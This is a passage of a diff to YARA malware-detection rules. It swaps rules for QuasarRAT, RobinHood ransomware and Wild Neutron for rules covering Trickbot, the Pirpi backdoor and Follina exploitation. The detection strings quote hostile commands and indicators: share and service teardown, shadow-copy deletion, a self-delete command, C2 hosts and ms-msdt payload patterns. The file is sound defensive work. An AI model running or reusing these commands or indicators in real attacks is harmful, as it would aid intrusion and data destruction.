-		$x3 = "HandleGetKeyloggerLogsResponse" fullword ascii
-		$s1 = "DoShellExecuteResponse" fullword ascii
-		$s2 = "GetPasswordsResponse" fullword ascii
-		$s3 = "GetStartupItemsResponse" fullword ascii
-		$s4 = "<GetGenReader>b__7" fullword ascii
-		$s5 = "RunHidden" fullword ascii
+		$s1 = "LoadShellCode" fullword ascii
+		$s2 = "pShellCode" fullword ascii
+		$s3 = "InitShellCode" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and $x1 ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_Quasarrat_May19_1 : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_6 : FILE
 {
 	meta:
-		description = "Detects QuasarRAT malware"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4e82b6a-31f8-59fc-acfa-805c4594680a"
-		date = "2019-05-27"
-		modified = "2023-01-06"
-		reference = "https://blog.ensilo.com/uncovering-new-activity-by-apt10"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_rat.yar#L61-L89"
+		id = "5feb8d34-4974-5315-a5f9-79a3fac83d1d"
+		date = "2019-10-02"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L98-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a189bce433c71d45fd7f5d7fc284fc5b35c88a7ec616dd392d0e931165263aca"
+		logic_hash = "599b1f56483f4ea267595b90dd4ef93b7e2147e4a0d8449cdd9d2539a96c3f79"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded"
+		hash1 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
+		hash2 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
 
 	strings:
-		$x1 = "Quasar.Common.Messages" ascii fullword
-		$x2 = "Client.MimikatzTools" ascii fullword
-		$x3 = "Resources.powerkatz_x86.dll" ascii fullword
-		$x4 = "Uninstalling... good bye :-(" wide
-		$xc1 = { 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00
-               68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00
-               63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00
-               74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00
-               73 }
-		$xc2 = { 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20
-               00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C
-               00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E
-               00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20
-               00 2F 00 61 00 20 00 2F 00 71 00 20 00 2F 00 66
-               00 20 00 }
+		$x1 = "D:\\MyProjects\\spreader\\Release\\ssExecutor_x86.pdb" fullword ascii
+		$s1 = "%s\\appdata\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%s" fullword ascii
+		$s2 = "%s\\appdata\\roaming\\%s" fullword ascii
+		$s3 = "WINDOWS\\SYSTEM32\\TASKS" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize <= 400KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Robinhood_May19_1 : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_COVID19_Apr20_1 : FILE
 {
 	meta:
-		description = "Detects RobinHood Ransomware"
+		description = "Detects ransomware distributed in COVID-19 theme"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7199c0de-c925-5399-8fa6-852604190a21"
-		date = "2019-05-15"
+		id = "fc723d1f-e969-5af6-af57-70d00bf797f4"
+		date = "2020-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/BThurstonCPTECH/status/1128489465327030277"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_robinhood.yar#L2-L21"
+		reference = "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_covid_ransom.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5eef71b94f2488dceff80ec2daba689c12d13b2742ba9ae5ead58711339d6026"
+		logic_hash = "9b32ce1dff9d27c5f7541de97cd1198b0d837a69ee260b327c66a22ca6f30091"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "21cb84fc7b33e8e31364ff0e58b078db8f47494a239dc3ccbea8017ff60807e3"
+		hash1 = "2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326"
 
 	strings:
-		$s1 = ".enc_robbinhood" ascii
-		$s2 = "c:\\windows\\temp\\pub.key" ascii fullword
-		$s3 = "cmd.exe /c net use * /DELETE /Y" ascii
-		$s4 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
-		$s5 = "main.EnableShadowFucks" nocase
-		$s6 = "main.EnableRecoveryFCK" nocase
-		$s7 = "main.EnableLogLaunders" nocase
-		$s8 = "main.EnableServiceFuck" nocase
+		$s1 = "/savekey.php" wide
+		$op1 = { 3f ff ff ff ff ff 0b b4 }
+		$op2 = { 60 2e 2e 2e af 34 34 34 b8 34 34 34 b8 34 34 34 }
+		$op3 = { 1f 07 1a 37 85 05 05 36 83 05 05 36 83 05 05 34 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_1 : FILE
+rule SIGNATURE_BASE_Pirpi_1609_A : FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Detects Pirpi Backdoor - and other malware (generic rule)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7bcb407f-7f01-540a-852c-a37456270888"
-		date = "2015-07-10"
+		id = "72b996e2-56cf-5a8d-8d8b-97eda7105d26"
+		date = "2016-09-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L10-L34"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pirpi.yar#L10-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
-		logic_hash = "d8044761fa51f2afd16eb096aa9e896483387c47e10ce922f2ef32ebcbd1a520"
-		score = 60
+		logic_hash = "470745d0dd44c161ed6ec474f85531a3aca8ebb0adb98b902cb0b7465ca07d8b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a5a0bc350e774bd784fc25090518626b65a3ce10c7401f44a1616ea2ae32f4c"
+		hash2 = "8caa179ec20b6e3938d17132980e0b9fe8ef753a70052f7e857b339427eb0f78"
 
 	strings:
-		$s0 = "LiveUpdater.exe" fullword wide
-		$s1 = "id-at-postalAddress" fullword ascii
-		$s2 = "%d -> %d (default)" fullword wide
-		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s8 = "id-ce-keyUsage" fullword ascii
-		$s9 = "Key Usage" fullword ascii
-		$s32 = "UPDATE_ID" fullword wide
-		$s37 = "id-at-commonName" fullword ascii
-		$s38 = "2008R2" fullword wide
-		$s39 = "RSA-alt" fullword ascii
-		$s40 = "%02d.%04d.%s" fullword wide
+		$x1 = "expand.exe1.gif" fullword ascii
+		$c1 = "expand.exe" fullword ascii
+		$c2 = "ctf.exe" fullword ascii
+		$s1 = "flvUpdate.exe" fullword wide
+		$s2 = "www.ThinkWorking.com" fullword wide
+		$s3 = "ctfnon.exe" fullword ascii
+		$s4 = "flv%d.exe" fullword ascii
+		$s5 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
+		$s6 = "12811[%d].gif" fullword ascii
+		$s7 = "GetApp03" fullword wide
+		$s8 = "flvUpdate" fullword wide
+		$s9 = "%d-%4.4d%d" fullword ascii
+		$s10 = "http://%s/%5.5d.html" fullword ascii
+		$s11 = "flvbho.exe" fullword wide
+		$op1 = { 74 08 c1 cb 0d 03 da 40 eb }
+		$op2 = { 03 f5 56 8b 76 20 03 f5 33 c9 49 }
+		$op3 = { 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or all of ( $c* ) or all of ( $op* ) ) ) or ( 8 of them )
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_2 : FILE
+rule SIGNATURE_BASE_Pirpi_1609_B : FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Detects Pirpi Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1893c251-f81a-5361-91fa-f91a6d1379d2"
-		date = "2015-07-10"
+		id = "caf63b97-efd7-5cd4-8954-b86db4d93cf5"
+		date = "2016-09-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L36-L57"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pirpi.yar#L45-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
-		logic_hash = "3a796199a2e9f2711e5fbdc1050234a8f3c09f762bc645f49a705d9f112d9cdc"
-		score = 60
+		logic_hash = "4dafff80fb7bfcffccf96d991245c13b3208fd4f5a21488d7d6885758ef05078"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "498b98c02e19f4b03dc6a3a8b6ff8761ef2c0fedda846ced4b6f1c87b52468e7"
 
 	strings:
-		$s0 = "rundll32.exe \"%s\",#1" fullword wide
-		$s1 = "IgfxUpt.exe" fullword wide
-		$s2 = "id-at-postalAddress" fullword ascii
-		$s3 = "Intel(R) Common User Interface" fullword wide
-		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s11 = "Key Usage" fullword ascii
-		$s12 = "Intel Integrated Graphics Updater" fullword wide
-		$s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii
+		$s1 = "tconn <ip> <port> //set temp connect value, and disconnect." fullword ascii
+		$s2 = "E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d" fullword ascii
+		$s3 = "%s %s L* ListenCheckSsl fd(%d) SslV(-%d-)" fullword ascii
+		$s4 = "S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok." fullword ascii
+		$s5 = "E* ListenCheckSsl fd(%d) SslAccept Err %d" fullword ascii
+		$s6 = "%s-%s N110 Ssl Connect Ok(%s:%d)." fullword ascii
+		$s7 = "%s-%s N110 Basic Connect Ok(%s:%d)." fullword ascii
+		$s8 = "tconn <ip> <port>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_3 : FILE
+rule SIGNATURE_BASE_SUSP_PS1_Msdt_Execution_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1c5d1442-b2be-5a34-b5c9-78aaf67072c4"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L59-L83"
+		description = "Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Nasreddine Bencherchali, Christian Burkard"
+		id = "d48d9ac9-7d3e-51c9-b017-22829ae5ecfd"
+		date = "2022-05-31"
+		modified = "2025-03-21"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
-		logic_hash = "16d511412576df2eb6d9646856d37bd94af7648cc602510696b74fa0534e405d"
-		score = 60
+		logic_hash = "9b8a061de4210d23e58b5190a300ee331273fc98f357156a0bb1d79f9f2b49b1"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$x1 = "178.162.197.9" fullword ascii
-		$x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide
-		$s1 = "LiveUpdater.exe" fullword wide
-		$s2 = "id-at-postalAddress" fullword ascii
-		$s3 = "%d -> %d (default)" fullword wide
-		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s5 = "id-at-serialNumber" fullword ascii
-		$s6 = "ECDSA with SHA256" fullword ascii
-		$s7 = "Acer LiveUpdater" fullword wide
+		$a = "PCWDiagnostic" ascii wide fullword
+		$sa1 = "msdt.exe" ascii wide
+		$sa2 = "msdt " ascii wide
+		$sa3 = "ms-msdt" ascii wide
+		$sb1 = "/af " ascii wide
+		$sb2 = "-af " ascii wide
+		$sb3 = "IT_BrowseForFile=" ascii wide
+		$fp1 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00
+               46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00
+               00 00 70 00 63 00 77 00 72 00 75 00 6E 00 2E 00
+               65 00 78 00 65 00 }
+		$fp2 = "FilesFullTrust" wide
+		$fp3 = "Cisco Spark" ascii wide
+		$fp4 = "author: " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2020KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		filesize < 10MB and $a and 1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* ) and not uint8( 0 ) == 0x7B
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_4 : FILE
+rule SIGNATURE_BASE_SUSP_Doc_Wordxmlrels_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52ff5770-1ca4-54d9-b69d-8af0c392084e"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L85-L108"
+		description = "Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Tobias Michalski, Christian Burkard, Wojciech Cieslak"
+		id = "304c4816-b2f6-5319-9fe9-8f74bdb82ad0"
+		date = "2022-05-30"
+		modified = "2022-06-20"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L38-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
-		logic_hash = "4882b7c5f469615436490cd628ee3bb5b0dded43fb556ac6477cdadc6c8eff05"
-		score = 60
+		hash = "62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0"
+		logic_hash = "c9846f8c2c1724792de14ab4de0064f951a8faaf01cc27d873e600f29d59c842"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$x1 = "WinRAT-Win32-Release.exe" fullword ascii
-		$s0 = "rundll32.exe \"%s\",#1" fullword wide
-		$s1 = "RtlUpd.EXE" fullword wide
-		$s2 = "RtlUpd.exe" fullword wide
-		$s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide
-		$s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide
-		$s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s6 = "Key Usage" fullword ascii
-		$s7 = "id-at-serialNumber" fullword ascii
+		$a1 = "<Relationships" ascii
+		$a2 = "TargetMode=\"External\"" ascii
+		$x1 = ".html!" ascii
+		$x2 = ".htm!" ascii
+		$x3 = "%2E%68%74%6D%6C%21" ascii
+		$x4 = "%2E%68%74%6D%21" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1240KB and all of them
+		filesize < 50KB and all of ( $a* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_5 : FILE
+rule SIGNATURE_BASE_SUSP_Doc_RTF_Externalresource_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0df63255-155d-56b9-b86b-491855983095"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L110-L133"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Tobias Michalski, Christian Burkard"
+		id = "71bb97e0-ec12-504c-a1f6-25039ac91c86"
+		date = "2022-05-30"
+		modified = "2022-05-31"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
-		logic_hash = "57792a54c96c59a1e9ed961715c72187936aee6f001c2ed4f95ca84e799e9c8c"
-		score = 60
+		logic_hash = "c841e0c1ff78bf8dade5f573a7452b16a7f447cfc19417704b727684a8f3d3ff"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s0 = "LiveUpdater.exe" fullword wide
-		$s1 = "id-at-postalAddress" fullword ascii
-		$s2 = "%d -> %d (default)" fullword wide
-		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s4 = "sha-1WithRSAEncryption" fullword ascii
-		$s5 = "Postal code" fullword ascii
-		$s6 = "id-ce-keyUsage" fullword ascii
-		$s7 = "Key Usage" fullword ascii
-		$s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii
-		$s9 = "%02d.%04d.%s" fullword wide
+		$s1 = " LINK htmlfile \"http" ascii
+		$s2 = ".html!\" " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		uint32be( 0 ) == 0x7B5C7274 and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_6 : FILE
+rule SIGNATURE_BASE_EXPL_Follina_CVE_2022_30190_Msdt_Msprotocoluri_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c5d87cad-d1ca-5766-90c1-fc8ecfa3f14f"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L135-L149"
+		description = "Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Tobias Michalski, Christian Burkard"
+		id = "62e67c25-a420-5dac-9d1c-b0648ea6b574"
+		date = "2022-05-30"
+		modified = "2022-07-18"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L80-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
-		logic_hash = "7dc7f9815f2b2c934ecf93f5813bdb87364b2b9e2a5aebc04f76cfff43e46d30"
-		score = 60
+		logic_hash = "d56820737951f97606749c74025589e6a8ecbe70cfff069492368b2ba8528a7d"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2022-30190, FILE"
+		hash1 = "4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784"
+		hash2 = "778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07"
 
 	strings:
-		$s0 = "mshtaex.exe" fullword wide
+		$re1 = /location\.href\s{0,20}=\s{0,20}"ms-msdt:/
+		$a1 = "%6D%73%2D%6D%73%64%74%3A%2F" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 310KB and all of them
+		filesize > 3KB and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_7 : FILE
+rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_Jun22 : FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "22561c55-4294-50c9-a9b9-7b4ed98eec09"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L151-L176"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources"
+		author = "Christian Burkard"
+		id = "e9c83d58-6214-51d5-882a-4bd2ed6acc9a"
+		date = "2022-06-01"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L100-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
-		logic_hash = "8a081932be8fd03c37a87486570a02a31756ba6bd125dbed7da9703197447ea5"
-		score = 60
+		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
+		logic_hash = "36cb711399197c694ac4fa4fd49cd5d587a830e152a138c81851b8e16301803d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii
-		$s1 = "PEM_read_bio_PrivateKey failed" fullword ascii
-		$s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii
-		$s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii
-		$s4 = "clapi32.dll" fullword ascii
-		$s5 = "Connection from %s port %d" fullword ascii
-		$s6 = "/usr/etc/ssh_known_hosts" fullword ascii
-		$s7 = "Version: %s - %s %s %s %s" fullword ascii
-		$s8 = "[-] connect()" fullword ascii
-		$s9 = "/bin/sh /usr/etc/sshrc" fullword ascii
-		$s10 = "kexecdhs.c" fullword ascii
-		$s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii
+		$sa = "\\objdata" ascii nocase
+		$sb1 = "4f4c45324c696e6b" ascii
+		$sb2 = "4F4C45324C696E6B" ascii
+		$sc1 = "d0cf11e0a1b11ae1" ascii
+		$sc2 = "D0CF11E0A1B11AE1" ascii
+		$x1 = "68007400740070003a002f002f00" ascii
+		$x2 = "68007400740070003A002F002F00" ascii
+		$x3 = "680074007400700073003a002f002f00" ascii
+		$x4 = "680074007400700073003A002F002F00" ascii
+		$x5 = "6600740070003a002f002f00" ascii
+		$x6 = "6600740070003A002F002F00" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and $sa and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_9 : FILE
+rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_EMAIL_Jun22 : FILE
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dbfdbe8c-4a4a-5512-a03d-e9f80c853d48"
-		date = "2015-07-10"
-		modified = "2023-01-06"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_wildneutron.yar#L203-L223"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources inside e-mail attachments"
+		author = "Christian Burkard"
+		id = "48cde505-3ce4-52ef-b338-0c08ac4f63de"
+		date = "2022-06-01"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_doc_follina.yar#L133-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
-		logic_hash = "2029c94088e075cbcbae8d7d514cfc56add022d8776e59f04824d9ce9fd12794"
-		score = 60
-		quality = 85
+		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
+		logic_hash = "fcbb3e32762f8c67b5b226e8095b767d630f8c118521a82fc22f9a3cc272b794"
+		score = 75
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s0 = "http://get.adobe.com/flashplayer/" wide
-		$s4 = " Player Installer/Uninstaller" fullword wide
-		$s5 = "Adobe Flash Plugin Updater" fullword wide
-		$s6 = "uSOFTWARE\\Adobe" fullword wide
-		$s11 = "2008R2" fullword wide
-		$s12 = "%02d.%04d.%s" fullword wide
-		$s13 = "%d -> %d" fullword wide
+		$sa1 = "XG9iamRhdG" ascii
+		$sa2 = "xvYmpkYXRh" ascii
+		$sa3 = "cb2JqZGF0Y" ascii
+		$sb1 = "NGY0YzQ1MzI0YzY5NmU2Y" ascii
+		$sb2 = "RmNGM0NTMyNGM2OTZlNm" ascii
+		$sb3 = "0ZjRjNDUzMjRjNjk2ZTZi" ascii
+		$sb4 = "NEY0QzQ1MzI0QzY5NkU2Q" ascii
+		$sb5 = "RGNEM0NTMyNEM2OTZFNk" ascii
+		$sb6 = "0RjRDNDUzMjRDNjk2RTZC" ascii
+		$sc1 = "ZDBjZjExZTBhMWIxMWFlM" ascii
+		$sc2 = "QwY2YxMWUwYTFiMTFhZT" ascii
+		$sc3 = "kMGNmMTFlMGExYjExYWUx" ascii
+		$sc4 = "RDBDRjExRTBBMUIxMUFFM" ascii
